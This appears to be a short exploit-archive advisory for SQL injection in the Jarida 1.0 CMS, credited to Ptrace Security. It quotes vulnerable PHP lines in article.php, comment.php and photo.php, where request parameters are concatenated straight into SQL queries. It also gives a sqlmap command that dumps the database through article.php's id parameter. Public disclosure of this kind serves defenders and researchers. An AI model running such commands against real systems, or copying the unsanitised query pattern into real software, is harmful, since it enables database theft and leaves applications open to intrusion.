45 lines
No EOL
1.6 KiB
Text
45 lines
No EOL
1.6 KiB
Text
# Exploit Title: Jarida 1.0 SQL Injection
|
|
# Date : 26 September 2011
|
|
# Author : Ptrace Security (Gianni Gnesa [gnix])
|
|
# Contact : research[at]ptrace-security[dot]com
|
|
# Software Link: http://sourceforge.net/projects/jarida/
|
|
# Version : 1.0
|
|
# Tested on : CentOS 5.6
|
|
|
|
|
|
[01] ./article.php:28: $query = "SELECT article_id FROM tblArticle WHERE article_id = " . $_GET['id'];
|
|
=> ./sqlmap.py -u http://192.168.109.111/jarida_1.0/article.php?id=1 --dump --tables
|
|
|
|
|
|
[02] ./comment.php
|
|
|
|
36 $name = $_POST['name'];
|
|
37 $web = $_POST['web'];
|
|
38 $title = $_POST['title'];
|
|
39 $body = $_POST['body'];
|
|
40 $ip = $_SERVER['REMOTE_ADDR'];
|
|
41 $article_id = $_POST['id'];
|
|
42 $date = time();
|
|
43
|
|
...
|
|
56
|
|
57 switch($_POST['type'])
|
|
58 {
|
|
59 case 'article':
|
|
60 $redirect_url = "./article.php?id=" . $_POST['id'];
|
|
61 $query = "INSERT INTO tblArticleComment (comment_article_id, comment_title, comment_date, comment_body, comment_name, comment_web, comment_ip)
|
|
62 VALUES('$article_id', '$title', '$date', '$body', '$name', '$web', '$ip')";
|
|
63 break;
|
|
64
|
|
65 case 'photo':
|
|
66 $redirect_url = "./photo.php?id=" . $_POST['id'];
|
|
67 $query = "INSERT INTO tblPhotoComment (comment_photo_id, comment_title, comment_date, comment_body, comment_name, comment_web, comment_ip)
|
|
68 VALUES('$article_id', '$title', '$date', '$body', '$name', '$web', '$ip')";
|
|
69 break;
|
|
70 }
|
|
|
|
|
|
[03] ./photo.php
|
|
|
|
39 $query = "SELECT photo_id FROM tblPhoto
|
|
40 WHERE photo_id = " . $_GET['id']; |